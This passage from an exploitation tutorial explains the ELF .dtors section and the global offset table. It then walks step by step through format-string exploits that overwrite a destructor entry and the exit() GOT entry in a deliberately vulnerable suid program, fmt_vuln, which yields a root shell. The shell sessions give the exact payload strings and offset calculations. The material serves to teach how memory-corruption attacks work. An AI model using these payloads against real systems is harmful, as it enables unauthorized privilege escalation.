and then when main() exits, the destructor is called..
In the cleanup function now..
$

This behavior of automatically executing a function on exit is controlled by the .dtors table section of the binary. This section is an array of 32-bit addresses terminated by a null address. The array always begins with 0xffffffff and ends with the null address of 0x00000000. Between these two are the addresses of all the functions that have been declared with the destructor attribute.

The nm command can be used to find the address of the cleanup function, and objdump can be used to examine the sections of the binary.

$ nm ./dtors_sample
080494d0 D _DYNAMIC
080495b0 D _GLOBAL_OFFSET_TABLE_
08048404 R _IO_stdin_used
         w _Jv_RegisterClasses
0804959c d __CTOR_END__
08049598 d __CTOR_LIST__
080495a8 d __DTOR_END__
080495a0 d __DTOR_LIST__
080494cc d __EH_FRAME_BEGIN__
080494cc d __FRAME_END__
080495ac d __JCR_END__
080495ac d __JCR_LIST__
080495cc A __bss_start
080494c0 D __data_start
080483b0 t __do_global_ctors_aux
08048300 t __do_global_dtors_aux
080494c4 d __dso_handle
         w __gmon_start__
         U __libc_start_main@@GLIBC_2.0
080495cc A _edata
080495d0 A _end
080483e0 T _fini
08048400 R _fp_hw
08048254 T _init
080482b0 T _start
080482d4 t call_gmon_start
0804839c t cleanup
080495cc b completed.1
080494c0 W data_start
         U exit@@GLIBC_2.0
08048340 t frame_dummy
08048368 T main
080494c8 d p.0
         U printf@@GLIBC_2.0
$ objdump -s -j .dtors ./dtors_sample

./dtors_sample:     file format elf32-i386
Contents of section .dtors:
 80495a0 ffffffff 9c830408 00000000       ............
$

The nm command shows that the cleanup function is located at 0x0804839c. It also reveals that the .dtors section starts at 0x080495a0 with __DTOR_LIST__ and ends at 0x080495a8 with __DTOR_END__. This means that 0x080495a0 should contain 0xffffffff, 0x080495a8 should contain 0x00000000, and the address between them, 0x080495a4, should contain the address of the cleanup function, 0x0804839c.

The objdump command shows the actual contents of the .dtors section, although in a slightly confusing format. The first value of 80495a0 is simply showing the address where the .dtors section is located. Then the actual bytes are shown, which means the bytes are reversed. Bearing this in mind, everything appears correct.

An interesting detail about the .dtors section is that it's a writable section. An object dump of the headers will verify this by showing that the .dtors section isn't labeled READONLY.

$ objdump -h ./dtors_sample

./dtors_sample:    file format elf32-i386

Sections:
Idx Name          Size      VMA      LMA      File off Algn
  0 .interp       00000013  080480f4 080480f4 000000f4 2**0
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  1 .note.ABI-tag 00000020  08048108 08048108 00000108 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  2 .hash         0000002c  08048128 08048128 00000128 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  3 .dynsym       00000060  08048154 08048154 00000154 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  4 .dynstr       00000051  080481b4 080481b4 000001b4 2**0
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  5 .gnu.version  0000000c  08048206 08048206 00000206 2**1
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  6 .gnu.version_r 00000020 08048214 08048214 00000214 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  7 .rel.dyn      00000008  08048234 08048234 00000234 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  8 .rel.plt      00000018  0804823c 0804823c 0000023c 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  9 .init         00000018  08048254 08048254 00000254 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 10 .plt          00000040  0804826c 0804826c 0000026c 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 11 .text         00000130  080482b0 080482b0 000002b0 2**4
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 12 .fini         0000001c  080483e0 080483e0 000003e0 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 13 .rodata       000000c0  08048400 08048400 00000400 2**5
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 14 .data         0000000c  080494c0 080494c0 000004c0 2**2
                  CONTENTS, ALLOC, LOAD, DATA
 15 .eh_frame     00000004  080494cc 080494cc 000004cc 2**2
                  CONTENTS, ALLOC, LOAD, DATA
 16 .dynamic      000000c8  080494d0 080494d0 000004d0 2**2
                  CONTENTS, ALLOC, LOAD, DATA
 17 .ctors        00000008  08049598 08049598 00000598 2**2
                  CONTENTS, ALLOC, LOAD, DATA
 18 .dtors        0000000c 080495a0 080495a0 000005a0 2**2
                  CONTENTS, ALLOC, LOAD, DATA
 19 .jcr          00000004  080495ac 080495ac 000005ac 2**2
                  CONTENTS, ALLOC, LOAD, DATA
 20 .got          0000001c  080495b0 080495b0 000005b0 2**2
                  CONTENTS, ALLOC, LOAD, DATA
 21 .bss          00000004  080495cc 080495cc 000005cc 2**2
                  ALLOC
 22 .comment      00000060  00000000 00000000 000005cc 2**0
                  CONTENTS, READONLY
 23 .debug_aranges 00000058 00000000 00000000 00000630 2**3
                  CONTENTS, READONLY, DEBUGGING
 24 .debug_info   000000b4  00000000 00000000 00000688 2**0
                  CONTENTS, READONLY, DEBUGGING
 25 .debug_abbrev 0000001c  00000000 00000000 0000073c 2**0
                  CONTENTS, READONLY, DEBUGGING
 26 .debug_line   000000ff  00000000 00000000 00000758 2**0
                  CONTENTS, READONLY, DEBUGGING
$

Another interesting detail about the .dtors section is that it is included in all binaries compiled with the GNU C compiler, regardless of whether any functions were declared with the destructor attribute. This means that the vulnerable format-string program, fmt_vuln, must have a .dtors section containing nothing. This can be inspected using nm and objdump.

$ nm ./fmt_vuln | grep DTOR
0804964c d __DTOR_END__
08049648 d __DTOR_LIST__
$ objdump -s -j .dtors ./fmt_vuln

./fmt_vuln:     file format elf32-i386

Contents of section .dtors:
 8049648 ffffffff 00000000             ........
$

As this output shows, the distance between __DTOR_LIST__ and __DTOR_END__ is only 4 bytes this time, which means there are no addresses between them. The object dump verifies this.

Because the .dtors section is writable, if the address after the 0xffffffff is overwritten with a memory address, the program's execution flow will be directed to that address when the program exits. This will be the address of __DTOR_LIST__ plus 4, which is 0x0804964c (which also happens to be the address of __DTOR_END__ in this case).

If the program is suid root, and this address can be overwritten, it will be possible to obtain a root shell.

$ export SHELLCODE='cat shellcode'
$ ./getenvaddr SHELLCODE
SHELLCODE is located at 0xbffffd90
$ pcalc 0x90 + 4
        148             0x94          0y10010100
$

Shellcode can be put into an environment variable, and the address can be predicted as usual. Because the difference of program name length between the helper program getenvaddr and the vulnerable fmt_vuln program is 2 bytes, the shellcode will be located at 0xbffffd94 when fmt_vuln is executed. This address simply has to be written into the .dtors section at 0x0804964c using the format-string vulnerability. The test_val variable is used first, for clarity's sake, but all the necessary calculations can be done in advance.

$ pcalc 0x94 - 16
        132          0x84          0y10000100
$ ./fmt_vuln 'printf
"\x70\x95\x04\x08\x71\x95\x04\x08\x72\x95\x04\x08\x73\x95\x04\x08"'%3\$132x%4\$n
The right way:
%3$132x%4$n
The wrong way:

                                                   3e8
[*] test_val @ 0x08049570 = 148 0x00000094
$ pcalc 0xfd - 0x94
        105            0x69             0y1101001
$ ./fmt_vuln 'printf
"\x70\x95\x04\x08\x71\x95\x04\x08\x72\x95\x04\x08\x73\x95\x04\x08"'%3\$132x%4\$n%3\
$105x%5\$n
The right way:
%3$132x%4$n%3$105x%5$n
The wrong way:

                                                         3e8

                  3e8
[*] test_val @ 0x08049570 = 64916 0x0000fd94
$ pcalc 0xff - 0xfd
        2               0x2             0y10
$ pcalc 0x1ff - 0xfd
        258             0x102           0y100000010
$ ./fmt_vuln 'printf
"\x70\x95\x04\x08\x71\x95\x04\x08\x72\x95\x04\x08\x73\x95\x04\x08"'%3\$132x%4\$n%3\
$105x%5\$n%3\$258x%6\$n
The right way:
%3$132x%4$n%3$105x%5$n%3$258x%6$n
The wrong way:

                                                      3e8
               3e8

                                                         3e8
[*] test_val @ 0x08049570 = 33553812 0x01fffd94
$ pcalc 0xbf - 0xff
        -64            0xffffffc0       0y11111111111111111111111111000000
$ pcalc 0x1bf - 0xff
        192            0xc0             0y11000000
$ ./fmt_vuln 'printf
"\x70\x95\x04\x08\x71\x95\x04\x08\x72\x95\x04\x08\x73\x95\x04\x08"'%3\$132x%4\$n%3\
$105x%5\$n%3\$258x%6\$n%3\$192x%7\$n
The right way:
%3$132x%4$n%3$105x%5$n%3$258x%6$n%3$192x%7$n
The wrong way:

                                                   3e8

               3e8

                                                      3e8

                                    3e8
[*] test_val @ 0x08049570 = -1073742444 0xbffffd94
$

Now the first four addresses in the beginning of the format string just need to be changed to 0x0804964c, 0x0804964d, 0x0804964e, and 0x0804964f, in order to write the 0xbffffd94 address to the .dtors section, instead of to test_val.

$ ./fmt_vuln 'printf
"\x4c\x96\x04\x08\x4d\x96\x04\x08\x4e\x96\x04\x08\x4f\x96\x04\x08"'%3\$132x%4\$n%3\
$105x%5\$n%3\$258x%6\$n%3\$192x%7\$n
The right way:
%3$132x%4$n%3$105x%5$n%3$258x%6$n%3$192x%7$n
The wrong way:

                                                           3e8

                  3e8

                                                               3e8

                                   3e8
[*] test_val @ 0x08049570 = -72 0xffffffb8
sh-2.05a# whoami
root
sh-2.05a#

Even though the .dtors section isn't properly terminated with a null address of 0x00000000, the shellcode address is still considered to be a destructor function, and it will be called when the program is exited, providing a root shell.

0x297 Overwriting the Global Offset Table

Because a program could use a function in a shared library many times, it's useful to have a table to reference all the functions. Another special section in compiled programs is used for this purpose — the procedure linkage table, or PLT for short. This section consists of many jump instructions, each one corresponding to the address of a function. It works sort of like a springboard. Each time a shared function needs to be called, control will pass through the procedure linkage table.

An object dump disassembling the PLT section in the vulnerable format-string program (fmt_vuln) shows these jump instructions:

$ objdump -d -j .plt ./fmt_vuln

./fmt_vuln:      file format elf32-i386

Disassembly of section .plt:

08048290 <.plt>:
8048290:    ff 35 58 96 04 08    pushl    0x8049658
8048296:    ff 25 5c 96 04 08    jmp      *0x804965c
804829c:    00 00                add      %al,(%eax)
804829e:    00 00                add      %al,(%eax)
80482a0:    ff 25 60 96 04 08    jmp      *0x8049660
80482a6:    68 00 00 00 00       push      $0x0
80482ab:    e9 e0 ff ff ff       jmp       8048290 <_init+0x18>
80482b0:    ff 25 64 96 04 08    jmp       *0x8049664
80482b6:    68 08 00 00 00       push      $0x8
80482bb:    e9 d0 ff ff ff       jmp       8048290 <_init+0x18>
80482c0:    ff 25 68 96 04 08    jmp       *0x8049668
80482c6:    68 10 00 00 00       push      $0x10
80482cb:    e9 c0 ff ff ff       jmp       8048290 <_init+0x18>
80482d0:    ff 25 6c 96 04 08    jmp       *0x804966c
80482d6:    68 18 00 00 00       push      $0x18
80482db:    e9 b0 ff ff ff       jmp       8048290 <_init+0x18>
$

One of these jump instructions is associated with the exit function, which is called at the end of the program. If the jump instruction used for the exit function can be manipulated to direct the execution flow into shellcode instead of the exit function, a root shell will be spawned. Next, the PLT section is examined in a bit more detail.

$ objdump -h ./fmt_vuln | grep -A 1 .plt
  8 .rel.plt 00000020 08048258 08048258 00000258 2**2
             CONTENTS, ALLOC, LOAD, READONLY, DATA
--
 10 .plt     00000050 08048290 08048290 00000290 2**2
             CONTENTS, ALLOC, LOAD, READONLY, CODE
$

As this output shows, the procedure linking table is unfortunately read-only. But closer examination of the jump instructions reveals that they aren't jumping to addresses, but pointers to addresses. This means that the actual locations of all the functions are located at the memory addresses 0x08049660, 0x08049664, 0x08049668, and 0x0804966c.

These memory addresses lie in another special section, called the global offset table (GOT). One very interesting detail about the global offset table is that it isn't marked as read-only, as the following output shows.

$ objdump -h ./fmt_vuln | grep -A 1 .got
 20 .got          00000020 08049654 08049654 00000654 2**2
                  CONTENTS, ALLOC, LOAD, DATA
$ objdump -d -j .got ./fmt_vuln
./fmt_vuln: file format elf32-i386

Disassembly of section .got:

08049654 <_GLOBAL_OFFSET_TABLE_>:
 8049654:        78 95 04 08 00 00 00 00 00 00 00 00 a6 82 04 08
x...............
 8049664:        b6 82 04 08 c6 82 04 08 d6 82 04 08 00 00 00 00
................
$

This shows that the jump instruction jmp *0x08049660 in the procedure linkage table actually jumps the program execution to 0x080482a6, because 0x080482a6 is located at 0x08049660 in the global offset table. The subsequent jump instructions (jmp *0x08049664, jmp *0x08049668, and jmp *0x0804966c) actually jump to 0x080482b6, 0x080482c6, and 0x080482d6, respectively. Because the global offset table can be written to, if one of these addresses is overwritten, the execution flow of the program can be controlled through the procedure linkage table, despite the lack of write access.

That being said, the necessary information, including the function names, can be obtained by displaying the dynamic relocation entries for the binary by using objdump.

$ objdump -R ./fmt_vuln

./fmt_vuln: file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
08049670 R_386_GLOB_DAT    __gmon_start__
08049660 R_386_JUMP_SLOT   __libc_start_main
08049664 R_386_JUMP_SLOT   printf
08049668 R_386_JUMP_SLOT   exit
0804966c R_386_JUMP_SLOT   strcpy


$

This reveals that the address of the exit function is located in the global offset table at 0x08049668. If the address of the shellcode is overwritten at this location, the program should call the shellcode when it thinks it's calling the exit function.

As usual, the shellcode is put in an environment variable, its actual location is predicted, and the format-string vulnerability is used to write the value. Actually, the shellcode should still be located in the environment from before, meaning that the only thing that needs adjustment is the first 16 bytes of the format string. The calculations for the %x format parameters will be done once again for clarity.


$ export SHELLCODE='cat shellcode'
$ ./getenvaddr SHELLCODE
SHELLCODE is located at 0xbffffd90
$ pcalc 0x90 + 4
        148             0x94          0y10010100
$ pcalc 0x94 - 16
        132             0x84          0y10000100
$ pcalc 0xfd - 0x94
        105             0x69          0y1101001
$ pcalc 0x1ff - 0xfd
        258             0x102         0y100000010
$ pcalc 0x1bf - 0xff
        192             0xc0          0y11000000
$ ./fmt_vuln 'printf
"\x68\x96\x04\x08\x69\x96\x04\x08\x6a\x96\x04\x08\x6b\x96\x04\x08"'%3\$132x%4\$n%3\
$105x%5\$n%3\$258x%6\$n%3\$192x%7\$n
The right way:
%3$132x%4$n%3$105x%5$n%3$258x%6$n%3$192x%7$n
The wrong way:

                                                   3e8

               3e8

                                                      3e8

                                    3e8
[*] test_val @ 0x08049570 = -72 0xffffffb8
sh-2.05a# whoami
root
sh-2.05a#

When fmt_vuln tries to call the exit function, the address of the exit function is looked up in the global offset table and is jumped to via the procedure linkage table. Because the actual address has been switched with the address for the shellcode in the environment, a root shell is spawned.

Another advantage of overwriting the global offset table is that the GOT entries are fixed per binary, so a different system with the same binary will have the same GOT entry at the same address.

The ability to overwrite any arbitrary address opens up many possibilities for exploitation. Basically, any section of memory that is writable and contains an address that directs the flow of program execution can be targeted.